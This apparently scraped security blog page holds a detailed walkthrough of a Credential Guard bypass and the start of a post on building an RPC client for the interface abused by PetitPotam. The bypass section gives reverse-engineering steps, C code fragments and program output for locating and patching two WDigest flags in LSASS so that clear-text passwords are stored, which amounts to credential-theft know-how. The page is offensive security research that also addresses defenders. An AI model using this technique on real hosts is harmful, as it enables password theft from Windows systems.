Reading view

There are new articles available, click to refresh the page.

Extracting PEAP Credentials from Wired Network Profiles

A colleague of mine recently found himself in a situation where he had physical access to a Windows machine connected to a wired network using 802.1X and saved user credentials for the authentication. Naturally, he wanted to extract those credentials. Nothing extraordinary about that you might think, and yet, there was a twist… Where to start? For this blog post, I will assume the reader is a...

A Practical Guide to PrintNightmare in 2024

Although PrintNightmare and its variants were theoretically all addressed by Microsoft, it is still affecting organizations to this date, mainly because of quite confusing group policies and settings. In this blog post, I want to shed a light on those configuration issues, and hopefully provide clear guidance on how to remediate them. “PrintNightmare” and “Point and Print” Unless you’ve been ...

Insomni'hack 2024 CTF Teaser - Cache Cache

Last year, for the Insomni’hack 2023 CTF Teaser, I created a challenge based on a logic bug in a Windows RPC server. I was pleased with the result, so I renewed the experience. Besides, I already knew what type of bug to tackle for this new edition. :smiling_imp: Personal thoughts Like my previous write-up, I will begin with some thoughts about the difficulties of creating a challenge and fac...

A Deep Dive into TPM-based BitLocker Drive Encryption

When I investigated CVE-2022-41099, a BitLocker Drive Encryption bypass through the Windows Recovery Environment (WinRE), the fact that the latter was able to transparently access an encrypted drive without requiring the recovery password struck me. My initial thought was that there had to be a way to reproduce this behavior and obtain the master key from the Recovery Environment (WinRE). The o...

CVE-2022-41099 - Analysis of a BitLocker Drive Encryption Bypass

In November 2022, an advisory was published by Microsoft about a BitLocker bypass. This vulnerability caught my attention because the fix required a manual operation by users and system administrators, even after installing all the security updates. Couple this with the fact that the procedure was not well documented initially, and you have the perfect recipe for disaster. This is typically th...

Bypassing PPL in Userland (again)

This post is a sequel to Bypassing LSA Protection in Userland and The End of PPLdump. Here, I will discuss how I was able to bypass the latest mitigation implemented by Microsoft and develop a new Userland exploit for injecting arbitrary code in a PPL with the highest signer type. The current state of PP(L)s My previous work on protected processes (see Bypassing LSA Protection in Userland) yi...

Insomni'hack 2023 CTF Teaser - InsoBug

For this edition of Insomni’hack, I wanted to create a special challenge based on my knowledge of some Windows internals. In this post, I will share some thoughts about the process and, most importantly, provide a detailed write-up. Personal thoughts I want to start this post by sharing a few thoughts on CTFs and the process of creating a challenge. If you want to skip this part, feel free to...

Debugging Protected Processes

Whenever I need to debug a protected process, I usually disable the protection in the Kernel so that I can attach a User-mode debugger. This has always served me well until it sort of backfired. The problem with protected processes The problem with protected processes, when it comes to debugging, is basically that they are… protected. Jokes aside, this means that, as you know, you cannot atta...

The End of PPLdump

A few days ago, an issue was opened for PPLdump on GitHub, stating that it no longer worked on Windows 10 21H2 Build 19044.1826. I was skeptical at first so I fired up a new VM and started investigating. Here is what I found… PPLdump in a nutshell If you are reading this, I would assume that you already know what PPLdump is and what it does. But just in case you do not, here is a very brief s...

Bypassing LSA Protection in Userland

In 2018, James Forshaw published an article in which he briefly mentioned a trick that could be used to inject arbitrary code into a PPL as an administrator. However, I feel like this post did not get the attention it deserved as it literally described a potential Userland exploit for bypassing PPL (which includes LSA Protection). Introduction I was doing some research on Protected Processes ...

Revisiting a Credential Guard Bypass

You probably have already heard or read about this clever Credential Guard bypass which consists in simply patching two global variables in LSASS. All the implementations I have found rely on hardcoded offsets, so I wondered how difficult it would be to retrieve these values at run-time instead. Background As a reminder, when (Windows Defender) Credential Guard is enabled on a Windows host, t...

From RpcView to PetitPotam

In the previous post we saw how to set up a Windows 10 machine in order to manually analyze Windows RPC with RpcView. In this post, we will see how the information provided by this tool can be used to create a basic RPC client application in C/C++. Then, we will see how we can reproduce the trick used in the PetitPotam tool. The Theory Before diving into the main subject, I need to discuss so...

Fuzzing Windows RPC with RpcView

The recent release of PetitPotam by @topotam77 motivated me to get back to Windows RPC fuzzing. On this occasion, I thought it would be cool to write a blog post explaining how one can get into this security research area. RPC as a Fuzzing Target? As you know, RPC stands for “Remote Procedure Call”, and it isn’t a Windows specific concept. The first implementations of RPC were made on UNIX sy...

Do You Really Know About LSA Protection (RunAsPPL)?

When it comes to protecting against credentials theft on Windows, enabling LSA Protection (a.k.a. RunAsPPL) on LSASS may be considered as the very first recommendation to implement. But do you really know what a PPL is? In this post, I want to cover some core concepts about Protected Processes and also prepare the ground for a follow-up article that will be released in the coming days. Introdu...

An Unconventional Exploit for the RpcEptMapper Registry Key Vulnerability

A few days ago, I released Perfusion, an exploit tool for the RpcEptMapper registry key vulnerability that I discussed in my previous post. Here, I want to discuss the strategy I opted for when I developed the exploit. Although it is not as technical as a memory corruption exploit, I still learned a few tricks that I wanted to share. In the Previous Episode… Before we begin, here is a brief s...

Revisiting a Credential Guard Bypass

You probably have already heard or read about this clever Credential Guard bypass which consists in simply patching two global variables in LSASS. All the implementations I have found rely on hardcoded offsets, so I wondered how difficult it would be to retrieve these values at run-time instead.

Background

As a reminder, when (Windows Defender) Credential Guard is enabled on a Windows host, there are two lsass.exe processes, the usual one and one running inside a Hyper-V Virtual Machine. Accessing the juicy stuff in this isolated lsass.exe process therefore means breaking the hypervisor, which is not an easy task.

Source: https://docs.microsoft.com/en-us/windows/security/identity-protection/credential-guard/credential-guard-how-it-works

Though, in August 2020, an article was posted on Team Hydra’s blog with the following title: Bypassing Credential Guard. In this post, @N4k3dTurtl3 discussed a very clever and simple trick. In short, the too well-known WDigest module (wdigest.dll), which is loaded by LSASS, has two interesting global variables: g_IsCredGuardEnabled and g_fParameter_UseLogonCredential. Their name is rather self explanatory, the first one holds the state of Credential Guard within the module (is it enabled or not?), the second one determines whether clear-text passwords should be stored in memory. By flipping these two values, you can trick the WDigest module into acting as if Credential Guard was not enabled and if the system was configured to keep clear-text passwords in memory. Once these two values have been properly patched within the LSASS process, the latter will keep a copy of the users’ password when the next authentication occurs. In other words, you won’t be able to access previously stored credentials but you will be able to extract clear-text passwords afterwards.

The implementation of this technique is rather simple. You first determine the offsets of the two global variables by loading wdigest.dll in a disassembler or a debugger along with the public symbols (the offsets may vary depending on the file version). After that, you just have to find the module’s base address to calculate their absolute address. Once their location is known, the values can be patched and/or restored in the target lsass.exe process.

The original PoC is available here. I found two other projects implementing it: WdToggle (a BOF module for Cobalt Strike) and EDRSandblast. All these implementations rely on hardcoded offsets, but is there a more elegant way? Is it possible to find them at run-time?

We need a plan

If we want to find the offsets of these two variables, we first have to understand how and where they are stored. So let’s fire up Ghidra, import the file C:\Windows\System32\wdigest.dll, load the public symbols and analyze the whole.

Loading the symbols allows us to quickly find these two values from the Symbol Tree. What we learn there is that g_IsCredGuardEnabled and g_fParameter_UseLogonCredential are two 4-byte values (i.e. double words / DWORD values) that are stored in the R/W .data section, nothing surprising about this.

If we take a look at what surrounds these two values, we can see that there is just a bunch of uninitialized data. And even once the module is loaded, there is most probably no particular marker that we will be able to leverage for identifying their location. It is like searching for a needle in a haystack, with the added challenge of not being able to distinguish the needle from the rest of the hay.

So, searching directly in the .data section is definitely not the way to go. There is a better approach, rather than searching for these values, we can search for cross references! The reason for these global variables to even exist in the first place is because they are used somewhere in the code. Therefore, if we can find these references, we can also find the variables.

Ghidra conveniently lists all the cross-references in the “Listing” view, so let’s see if there is anything interesting.

Two cross-references immediately stand out - SpAcceptCredentials and SpInitialize - as they are common to both variables. If we can limit the search to a single place, the whole process will certainly be a bit easier. On top of that, looking at these two functions in the symbol tree, we can see that SpInitialize is exported by the DLL, which means that we can easily get its address with a call to GetProcAddress() for instance.

We can go to the “Decompile” view and have a glimpse at how these variables are used within the SpInitialize function.

The RegQueryValueExW call is interesting because the x86 opcode of a function call is rather easy to identify. From there, we could then work backwards and see how the fifth argument is handled. This is a potential avenue to consider so let’s keep it in mind.

That would be a way to identify the g_fParameter_UseLogonCredential variable but what about g_IsCredGuardEnabled? The code from the “Decompile” view is not that easy to interpret as is, so we will have to go a bit deeper.

g_IsCredGuardEnabled = (uint)((*(byte *)(param_2 + 1) & 0x20) != 0);

Here, I found the assembly code to be less confusing.

mov r15,param_2
; ...
test byte ptr [r15 + 0x4],0x20
cmovnz eax,esi
mov dword ptr [g_IsCredGuardEnabled],eax

First, the second parameter of the function call - param_2 - is loaded into the R15 register. Then, it is incremented by 0x04, dereferenced and finally compared against the value 0x20.

The function Spinitialize is documented here. The documentation tells us that the second parameter is a pointer to a SECPKG_PARAMETERS structure.

NTSTATUS Spinitializefn(
  [in] ULONG_PTR PackageId,
  [in] PSECPKG_PARAMETERS Parameters,
  [in] PLSA_SECPKG_FUNCTION_TABLE FunctionTable
)

The structure SECPKG_PARAMETERS is documented here. The attribute located at the offset 0x04 in the structure (c.f. byte ptr [R15 + 0x4]) is MachineState.

typedef struct _SECPKG_PARAMETERS {
  ULONG          Version;
  ULONG          MachineState;
  ULONG          SetupMode;
  PSID           DomainSid;
  UNICODE_STRING DomainName;
  UNICODE_STRING DnsDomainName;
  GUID           DomainGuid;
} SECPKG_PARAMETERS, *PSECPKG_PARAMETERS, SECPKG_EVENT_DOMAIN_CHANGE, *PSECPKG_EVENT_DOMAIN_CHANGE;

The documentation provides a list of possible flags for the MachineState attribute but it does not tell us what flag corresponds to the value 0x20. However it does tell us that the SECPKG_PARAMETERS structure is defined in the header file ntsecpkg.h. If so, we should find it in the Windows SDK, along with the SECPKG_STATE_* flags.

// Values for MachineState

#define SECPKG_STATE_ENCRYPTION_PERMITTED               0x01
#define SECPKG_STATE_STRONG_ENCRYPTION_PERMITTED        0x02
#define SECPKG_STATE_DOMAIN_CONTROLLER                  0x04
#define SECPKG_STATE_WORKSTATION                        0x08
#define SECPKG_STATE_STANDALONE                         0x10
#define SECPKG_STATE_CRED_ISOLATION_ENABLED             0x20
#define SECPKG_STATE_RESERVED_1                   0x80000000

Here we go! The value 0x20 corresponds to the flag SECPKG_STATE_CRED_ISOLATION_ENABLED, which makes quite a lot of sense in our case. In the end, the previous line of C code could simply be rewritten as follows.

g_IsCredGuardEnabled = (param_2->MachineState & SECPKG_STATE_CRED_ISOLATION_ENABLED) != 0;

Note: I could have also helped Ghidra a bit by defining this structure and editing the prototype of the SpInitialize function to achieve a similar result.

That’s all very well, but do we have clear opcode patterns to search for? The answer is “not really”… Prior to the RegQueryValueExW call, a reference to g_fParameter_UseLogonCredential is loaded in RAX, that’s a rather common operation and we cannot rely on the fact that the compiler will use the same register every time. After the call to RegQueryValueExW, g_fParameter_UseLogonCredential is set to 0 in an if statement. Again this is a generic operation so it is not good enough for establishing a pattern. As for g_IsCredGuardEnabled, there is an interesting set of instructions but we cannot rely on the fact that the compiler will produce the same code every time here either.

; Before the call to RegQueryValueExW
; 180003180 48 8d 05 2d 30 03 00
lea     rax,[g_fParameter_UseLogonCredential]
; ...
; 18000318e 48 89 44 24 20
mov     qword ptr [rsp + local_b8],rax=>g_fParameter_UseLogonCredential
; After the call to RegQueryValueExW
; 1800031b1 44 89 25 fc 2f 03 00
mov     dword ptr [g_fParameter_UseLogonCredential],r12d
; Test on param_2->MachineState
; 18000299b 41 f6 47 04 20
test    byte ptr [r15 + 0x4],0x20
; 1800029a0 0f 45 c6
cmovnz  eax,esi
; 1800029a3 89 05 5f 32 03 00
mov     dword ptr [g_IsCredGuardEnabled],eax

We are (almost) back to square one. However, we had a second option - SpAcceptCredentials - so let’s try our luck with this function. As it turns out, the two variables seem to be used in a single if statement as we can see in the “Decompile” view.

The original assembly consists of a CMP instruction, followed by a MOV instruction.

; 180001839 39 1d 75 49 03 00
cmp     dword ptr [g_fParameter_UseLogonCredential],ebx
; 18000183f 8b 05 c3 43 03 00
mov     eax,dword ptr [g_IsCredGuardEnabled]
; 180001845 0f 85 9c 77 00 00
jnz     LAB_180008fe7

Since the public symbols were imported and the PE file was analyzed, Ghidra conveniently displays the references to the variables rather than addresses or offsets. To better understand how this works though, we should have a look at the “raw” assembly code.

cmp    dword ptr [rip + 0x34975],ebx  ; 39 1d 75 49 03 00
mov    eax,dword ptr [rip + 0x343c3]  ; 8b 05 c3 43 03 00
jnz    0x77ae                         ; 0f 85 9c 77 00 00

On the first line, the first byte - 39 - is the opcode of the CMP instruction to compare a 16 or 32 bit register against a 16 or 32 bit value in another register or a memory location. Then, 1d represents the source register (EBX in this case). Finally, 75 49 03 00 is the little endian representation of the offset of g_fParameter_UseLogonCredential relative to RIP (rip+0x34975). The second line works pretty much the same way although it is a MOV instruction.

The third line represents a conditional jump, which won’t help us establish a reliable pattern. If we consider only the first two lines though, we can already build a potential pattern: 39 ?? ?? ?? ?? 00 8b ?? ?? ?? ?? 00. We just make the reasonable assumption that the offsets won’t exceed the value 0x00ffffff.

No need to say that this is not great but there is still room for improvement so let’s test it first and see if it is at least good enough as a starting point. For that matter, Ghidra has a convenient “Search Memory” tool that can be used to search for byte patterns.

To my surprise, this simple pattern yielded only one result in the entire file. Of course, it is not completely relevant because the PE file also has uninitialized data that could contain this pattern once it is loaded. Though, to address this issue, we can very well limit the search to the .text section because it is not subject to modifications at run-time.

There is still one last problem. I tested the pattern against a single file. What if this pattern is not generic enough or what if it yields false positives in other versions of wdigest.dll? If only there was an easy way to get my hands on multiple versions of the file to verify that…

And here comes the The Windows Binaries Index (or “Winbindex”). This is a nicely designed web application that aggregates all the metadata from update packages released by Microsoft. It also provides a link whenever the file is available for download. Kudos to @m417z for this tool, this is a game changer. From the home page, I can simply search for wdigest.dll and virtually get access to any version of the file.

Apart from the version installed in my VM (10.0.19041.388), I tested the above pattern against the oldest (10.0.10240.18638 - Windows 10 1507) and the most recent version I could find (10.0.22000.434 - Windows 11 21H2) and it worked amazingly well in both cases.

It looks like a plan is starting to emerge. In the end, the overall idea is pretty simple. We have to read the DLL, locate the .text section and simply search for our pattern in the raw data. From the matching buffer, we will then be able to extract the variable offsets and adjust them (more on that later).

Practical implementation

Let me quickly recap what we are trying to achieve. We want to read and patch two global variables within the wdigest.dll module. Because of their nature, these two variables are located in the R/W .data section, but they are not easy to locate as they are just simple boolean flags. However, we identified some code in the .text section that references them. So, the idea is to first extract their offsets from the assembly code, and then get the base address of the target module to find their exact location in the lsass.exe process.

Searching for our code pattern

We want to find a portion of the code that matches the pattern 39 ?? ?? ?? ?? 00 8b ?? ?? ?? ?? 00. To do so, we have to first locate the .text section of the wdigest.dll PE file. There are two ways to do this. We can either load the module in the memory of our process or read the file from disk. I decided to go for the second option (for no particular reason).

Locating the .text section is easy. The first bytes of the PE file contain the DOS header, which gives us the offset to the NT headers (e_lfanew). In the NT headers, we find the FileHeader member, which gives us the number of sections (NumberOfSections).

typedef struct _IMAGE_DOS_HEADER {      // DOS .EXE header
    WORD   e_magic;                     // Magic number
    // ...
    LONG   e_lfanew;                    // File address of new exe header
} IMAGE_DOS_HEADER, *PIMAGE_DOS_HEADER;

typedef struct _IMAGE_NT_HEADERS64 {
    DWORD Signature;
    IMAGE_FILE_HEADER FileHeader;
    IMAGE_OPTIONAL_HEADER64 OptionalHeader;
} IMAGE_NT_HEADERS64, *PIMAGE_NT_HEADERS64;

typedef IMAGE_NT_HEADERS64 IMAGE_NT_HEADERS;

typedef struct _IMAGE_FILE_HEADER {
    WORD    Machine;
    WORD    NumberOfSections;
    // ...
} IMAGE_FILE_HEADER, *PIMAGE_FILE_HEADER;

We can then simply iterate the section headers that are located after the NT headers, until with find the one with the name .text.

typedef struct _IMAGE_SECTION_HEADER {
    BYTE    Name[IMAGE_SIZEOF_SHORT_NAME];
    // ...
    DWORD   SizeOfRawData;
    DWORD   PointerToRawData;
    // ...
} IMAGE_SECTION_HEADER, *PIMAGE_SECTION_HEADER;

Once we have identified the section header corresponding to the .text section, we know its size and offset in the file. With that knowledge, we can invoke SetFilePointer to move our pointer of PointerToRawData bytes from the beginning of the file and read SizeOfRawData bytes into a pre-allocated buffer.

// hFile = CreateFileW(L"C:\\Windows\\System32\\wdigest.dll", ...);
PBYTE pTextSection = (PBYTE)LocalAlloc(LPTR, SectionHeader.SizeOfRawData);
SetFilePointer(hFile, SectionHeader.PointerToRawData, NULL, FILE_BEGIN);
ReadFile(hFile, pTextSection, SectionHeader.SizeOfRawData, NULL, NULL);

Then, it is just a matter of reading the buffer, which I did with a simple loop. When I find the byte 0x39, which is the first byte of the pattern, I simply check the following 11 bytes to see if they also match.

// Pattern: 39 ?? ?? ?? ?? 00 8b ?? ?? ?? ?? 00
j = 0;
while (j < sh.SizeOfRawData) {
  if (pTextSection[j] == 0x39) {
    if ((pTextSection[j + 5] == 0x00) && (pTextSection[j + 6] == 0x8b) && (pTextSection[j + 11] == 0x00)) {
          wprintf(L"Match at offset: 0x%04x\r\n", SectionHeader.VirtualAddress + j);
    }
  }
}

However, I do not stop at the first occurrence. As a simple safeguard, I check the entire section and count the number of times the pattern is matched. If this count is 0, obviously this means that the search failed. But if the count is greater than 1, I also consider that it failed. I want to make sure that the pattern matches only once.

Just for testing purposes and out of curiosity, I also tried several variants of the pattern to sort of see how efficient it was. Surprisingly, the count dropped very quickly with only two occurrences for the variant #2.

Variant Pattern Occurrences
1 39 .. .. .. .. 00 .. .. .. .. .. .. 98
2 39 .. .. .. .. 00 8b .. .. .. .. .. 2
3 39 .. .. .. .. 00 8b .. .. .. .. 00 1

If we execute the program, here is what we get so far. We have exactly one match at the offset 0x1839.

C:\Temp>WDigestCredGuardPatch.exe
Exactly one match found, good to go!
Matched code at 0x00001839: 39 1d 75 49 03 00 8b 05 c3 43 03 00

For good measure, we can verify if the offset 0x1839 is correct by going back to Ghidra. And indeed, the code we are interested in starts at 0x180001839.

Note: the value 0x180000000 is the default base address of the PE. This value can be found in NtHeaders.OptionalHeader.ImageBase.

Extracting the variable offsets

Below are the bytes that we were able to extract from the .text section, and their equivalent x86_64 disassembly.

cmp    dword ptr [rip + 0x34975], ebx   ; 39 1D   75 49 03 00
mov    eax, dword ptr [rip + 0x343c3]   ; 8B 05   C3 43 03 00

And here is the thing I intentionally glossed over in the first part. Since I am no used to reading assembly code, these two lines initially puzzled me. I was expecting to find the addresses of the two variables directly in the code, but instead, I found only RIP-relative offsets.

I learned that the x86_64 architecture indeed uses RIP-relative addressing to reference data. As explained in this post, the main advantage of using this kind of addressing is that it produces Position Independent Code (PIC).

The RIP-relative address of g_fParameter_UseLogonCredential is rip+0x34975. We found the code at the address 0x00001839, so the absolute offset of g_fParameter_UseLogonCredential should be 0x00001839 + 0x34975 = 0x361ae, right?

But the offset is actually 0x361b4. Oh, wait… When an instruction is executed, RIP actually already points to the next one. This means that we must add 6, the length of the CMP instruction, to this value: 0x00001839 + 6 + 0x34975 = 0x361b4. Here we go!

We apply the same method to the second variable - g_IsCredGuardEnabled - and we find: 0x00001839 + 6 + 6 + 0x343c3 = 0x35c08.

We identified the 12 bytes of code and we know their offset in the PE, so the implementation is pretty easy. The RIP-relative offsets are stored using the little endian representation, so we can directly copy the four bytes into DWORD temporary variables if we want to interpret them as unsigned long values.

DWORD dwUseLogonCredentialOffset, dwIsCredGuardEnabledOffset;

RtlMoveMemory(&dwUseLogonCredentialOffset, &Code[2], sizeof(dwUseLogonCredentialOffset));
RtlMoveMemory(&dwIsCredGuardEnabledOffset, &Code[8], sizeof(dwIsCredGuardEnabledOffset));
dwUseLogonCredentialOffset += 6 + dwCodeOffset;
dwIsCredGuardEnabledOffset += 6 + 6 + dwCodeOffset;

wprintf(L"Offset of g_fParameter_UseLogonCredential: 0x%08x\r\n", dwUseLogonCredentialOffset);
wprintf(L"Offset of g_IsCredGuardEnabled: 0x%08x\r\n", dwIsCredGuardEnabledOffset);

And here is the result.

C:\Temp>WDigestCredGuardPatch.exe
Exactly one match found, good to go!
Matched code at 0x00001839: 39 1d 75 49 03 00 8b 05 c3 43 03 00
Offset of g_fParameter_UseLogonCredential: 0x000361b4
Offset of g_IsCredGuardEnabled: 0x00035c08

Finding the base address

Now that we know the absolute offsets of the two global variables, we must determine their absolute address in the target process lsass.exe. Of course, this part was already implemented in the original PoC, using the following method:

  1. Open the lsass.exe process with PROCESS_ALL_ACCESS.
  2. List the loaded modules with EnumProcessModules.
  3. For each module, call GetModuleFileNameExA to determine whether it is wdigest.dll.
  4. If so, call GetModuleInformation to get its base address.

Ideally, we would like to interact as less as possible with LSASS, but as we need to patch it anyway, this method works perfectly fine. I just wanted to take this opportunity to present another approach and discuss some aspects of Windows DLLs.

The key thing is that the base address of a module is determined when it is first loaded. Therefore, any subsequent process loading this module will use the exact same base address. In our case, this means that if we load wdigest.dll in our current process, we will be able to determine its base address without even having to touch LSASS. (I will admit that this sounds a bit dumb because the whole purpose is to eventually patch it.)

Loading a DLL is commonly done through the Windows API LoadLibraryW or LoadLibraryExW. The documentation states that they return “a handle to the module”, but I would say that it is a bit misleading. These functions actually return a HMODULE, which is not a typical kernel object HANDLE. In reality, the HMODULE value is… the base address of the module.

In conclusion, we can get the base address of wdigest.dll in the lsass.exe process simply by running the following code in our own context. One could argue that loading wdigest.dll might look suspicious, but it is nothing compared to patching LSASS anyway so this is not really my concern here.

HMODULE hModule;
if ((hModule = LoadLibraryW(L"wdigest.dll")))
{
  wprintf(L"Base address of wdigest.dll: 0x%016p\r\n", hModule);
  FreeLibrary(hModule);
}

After adding this to my own PoC and calculating the addresses, here is what I get. Not bad!

C:\Temp>WDigestCredGuardPatch.exe
Exactly one match found, good to go!
Matched code at 0x00001839: 39 1d 75 49 03 00 8b 05 c3 43 03 00
Offset of g_fParameter_UseLogonCredential: 0x000361b4
Offset of g_IsCredGuardEnabled: 0x00035c08
Base address of wdigest.dll: 0x00007FFEE32B0000
Address of g_fParameter_UseLogonCredential: 0x00007ffee32e61b4
Address of g_IsCredGuardEnabled: 0x00007ffee32e5c08

We can confirm that the base address of wdigest.dll is the same by inspecting the memory of the lsass.exe process using Process Hacker for instance.

Conclusion

The first thing I want to say is thank you to @N4k3dTurtl3 for the initial post on this subject. I really liked the simplicity and efficiency of this trick. It always amazes me how this kind of hack can defeat really advanced protections such as Credential Guard.

Now, the question is, as a pentester (or a red teamer), should you use the technique I described in this post? The idea of not having to rely on hardcoded offsets and therefore running code that is version-independent is attractive. However, it might also be a bit riskier as pattern matching is not an exact science. To address this, I implemented a safeguard which consists in ensuring that the pattern is matched exactly once. This leaves us with only one potential false positive: the pattern could be matched exactly once on a random portion of code, which seems rather unlikely. The only risk I see is that Microsoft could slightly change the implementation so that my pattern just no longer works.

As for defenders, enabling Credential Guard should not refrain you from enabling LSA protection as well. We all know that it can be completely bypassed, but this operation has a cost for an attacker. It requires to run code in the Kernel or use a sophisticated userland bypass, which both create avenues for detection. As rightly said by @N4k3dTurtl3:

The goal is to increase the cost in time, effort, and tooling […] thus making your network less appealing as a target and increasing opportunities for detection and response.

Lastly, this was a cool little challenge, not too difficult, and as always I learned a few things along the way, the perfect recipe. Oh, and if you have read this far, you can find my PoC here.

Links & Resources

From RpcView to PetitPotam

In the previous post we saw how to set up a Windows 10 machine in order to manually analyze Windows RPC with RpcView. In this post, we will see how the information provided by this tool can be used to create a basic RPC client application in C/C++. Then, we will see how we can reproduce the trick used in the PetitPotam tool.

The Theory

Before diving into the main subject, I need to discuss some basic concepts first to make sure we are all on the same page. First, as I said in the previous post, DCE/RPC is one of the many IPC (InterProcess Communication) mechanisms used in Windows. It allows a process A - the RPC client - to invoke procedures or functions that are implemented and executed in a process B - the RPC server.

That being said, this raises some questions that I will quickly cover in the next paragraphs.

  • How does an RPC client distinguish an RPC server from another?
  • How does an RPC client know which procedures/functions are exposed by the RPC server?
  • How does an RPC client invoke the remote procedures/functions?

Interface Definition

I assume you are familiar with the concept of interface in the context of Object Oriented Programming (OOP). An interface is a sort of contract, consisting of a set of methods, that an Object must fulfill by implementing those said methods. With RPC, that’s exactly the same idea. The difference is that the methods are implemented in another process, and can even be accessed from a remote machine on the network.

If a client wants to consume an interface, they first need to know what is written in the interface’s contract. In other words, they need the following information:

  • The GUID of the interface : how to identify the interface?
  • A protocol sequence: how to interact with this interface?
  • An Opnum (i.e. a procedure ID): which procedure to call?
  • A set of parameters: what information does the server need in order to execute the procedure?

For that matter, the developer of an RPC server will usually release an IDL (Interface Definition Language) file. The purpose of this file is to provide the developer of an RPC client with all the information they need in order to consume this interface, without having to worry about its actual implementation on server-side. In a way, IDL for RPC interfaces is very similar to what WSDL/WADL are for web services and applications.

As an example, PetitPotam leverages the Encrypting File System Remote Protocol (EFSRPC), which is based on the EFSR interface. You can find the complete IDL file corresponding to this interface here, but I also included an extract below.

import "ms-dtyp.idl";

[
    uuid(c681d488-d850-11d0-8c52-00c04fd90f7e),
    version(1.0),
]

interface efsrpc
{
    typedef [context_handle] void * PEXIMPORT_CONTEXT_HANDLE;
    typedef pipe unsigned char EFS_EXIM_PIPE;
    
    /* [snip] */

    long EfsRpcOpenFileRaw(
        [in]            handle_t                   binding_h,
        [out]           PEXIMPORT_CONTEXT_HANDLE * hContext,
        [in, string]    wchar_t                  * FileName,
        [in]            long                       Flags
    );

    long EfsRpcReadFileRaw(
        [in]            PEXIMPORT_CONTEXT_HANDLE   hContext,
        [out]           EFS_EXIM_PIPE            * EfsOutPipe
    );

    /* [snip] */
}

In this file, we can find the UUID (Universal Unique Identifier) of the interface, some type definitions, and the prototype of the exposed procedures or functions. That’s all the information a client needs in order to invoke remote procedures.

Protocol Sequence

Knowing which procedures/functions are exposed by an interface isn’t actually sufficient to interact with it. The client also needs to know how to access this interface. The way a client talks to an RPC server is called the protocol sequence. Depending on the implementation of the RPC server, a given interface might even be accessible through multiple protocol sequences.

Generally speaking, Windows supports three protocols (source):

RPC Protocol Description
NCACN Network Computing Architecture connection-oriented protocol
NCADG Network Computing Architecture datagram protocol
NCALRPC Network Computing Architecture local remote procedure call

RPC protocols used for remote connections (NCACN and NCADG) through a network can be supported by many “transport” protocols. The most common transport protocol is obviously TCP/IP, but other more exotic protocols can also be used, such as IPX/SPX or AppleTalk DSP. The complete list of supported transport protocols is available here.

Although 14 Protocol Sequences are supported, only 4 of them are commonly used:

Protocol Sequence Description
ncacn_ip_tcp Connection-oriented Transmission Control Protocol/Internet Protocol (TCP/IP)
ncacn_np Connection-oriented named pipes
ncacn_http Connection-oriented TCP/IP using Microsoft Internet Information Server as HTTP proxy
ncalrpc Local procedure call

For instance, when using ncacn_np, the DCE/RPC requests are encapsulated inside SMB packets and sent to a remote named pipe. On the other hand, when using ncacn_ip_tcp, DCE/RPC requests are directly sent over TCP. I made the following diagram to illustrate these 4 protocol sequences.

Binding Handles

Once you know the definition of the interface and which protocol to use, you have (almost) all the information you need to connect or bind to the remote or local RPC server.

This concept is quite similar to how kernel object handles work. For example, when you want to write some data to a file, you first call CreateFile to open it. In return, the kernel gives you a handle that you can then use to write your data by passing the handle to WriteFile. Similarly, with RPC, you connect to an RPC server by creating a binding handle, that you can then use to invoke procedures or functions on the interface you requested access to. It’s as simple as that.

Note: this analogy is limited though as the RPC client initiates its own binding handle. The RPC server is then responsible for ensuring that the client has the appropriate privileges to invoke a given procedure.

Unlike with kernel object handles though, there are multiple types of binding handles: automatic, implicit and explicit. This type determines how much work a client has to do in order to initialize and/or manage the binding handle. In this post, I will cover only one example, but I made another diagram to illustrate these different cases.

For instance, if an RPC server requires the use of explicit binding handles, as a client, you have to write some code to create it first and then you have to explicitly pass it as an argument for each procedure call. On the other hand, if the server requires the use of automatic binding handles, you can just call a remote procedure, and the RPC runtime will take care of everything else, such as connecting to the server, passing the binding handle and closing it when it’s done.

The “PetitPotam” case

The EFSRPC protocol is widely documented here but, for the sake of this blog post, we will just pretend that this documentation does not exist. So, we will first see how we can collect all the information we need with RpcView. Then, we will see how we can use this information to write a simple RPC client application. Finally, we will use this RPC client application to experiment a bit and see what we can do with the exposed RPC procedures.

Exploring the EFSRPC Interface with RpcView

Let’s imagine we are randomly browsing the output of RpcView, searching for interesting procedure names. Since we downloaded the PDB files for all the DLLs that are in C:\Windows\System32 and we configured the appropriate path in the options (see part 1), this should feel pretty much like playing a video game. :nerd_face:

When clicking on the LSASS process (1), we can see that it contains many RPC interfaces. So we go through them one by one and we stop on the one with the GUID c681d488-d850-11d0-8c52-00c04fd90f7e (2) because it exposes several procedures that seem to perform file operations (according to their name) (3).

File operations initiated by low-privileged users and performed by privileged processes (such as services running as SYSTEM) are always interesting to investigate because they might lead to local privilege escalation (or even remote code execution in some cases). On top of that, they are relatively easy to find and visualize, using Process Monitor for instance.

In this example, RpcView provides other very useful information. It shows that the interface we selected is exposed through a named pipe: \pipe\lsass (4). It also shows us the name of the process, the path of the executable on disk and the user it runs as (5). Finally, we know that this interface is part of the “LSA extension for EFS”, which is implemented in C:\Windows\System32\efslsaext.dll (6).

Collecting all the Required Information

As I explained at the beginning of this post, in order to interact with an RPC server, a client needs some information: the ID of the interface, the protocol sequence to use and, last but not least, the definition of the interface itself. As we have seen in the previous part, RpcView already gives us the ID of the interface and the protocol sequence, but what about the interface’s definition?

  • ID of the interface: c681d488-d850-11d0-8c52-00c04fd90f7e
  • Protocol sequence: ncacn_np
  • Name of the endpoint: \pipe\lsass

And here comes what probably is the most powerful feature of RpcView. If you select the interface you are interested in, and right-click on it, you will see an option that allows you to “decompile” it. The “decompiled” IDL code will then appear in the “Decompilation” window right above it.

Although this feature is very powerful, it is not 100% reliable. So, don’t expect it to always produce a usable file, straight out of the box. Besides, some information such as the name of the structures is inevitably lost in the process. In the next parts, I will cover some common errors you may encounter when using the generated IDL file.

Creating an RPC Client for the EFSRPC Interface in C/C++

Now that we have all the information we need, we can create an RPC client in C/C++ and start playing around with the interface.

As I already explained how to install and set up Visual Studio, I won’t go through this step again in this post. Please note that I’m using Visual Studio Community 2019 and the latest version of the Windows 10 SDK is also installed. The versions should not be that important though as we are not doing anything fancy.

Let’s fire up Visual Studio and create a new C++ Console App project.

I will simply name this new project EfsrClient and save it in C:\Workspace.

Visual Studio will automatically create the file EfsrClient.cpp, which contains the main function along with some comments explaining how to compile and build the project. Usually, I get rid of these comments, and I rewrite the main function as follows, just to start with a clean file.

int wmain(int argc, wchar_t* argv[])
{
    
}

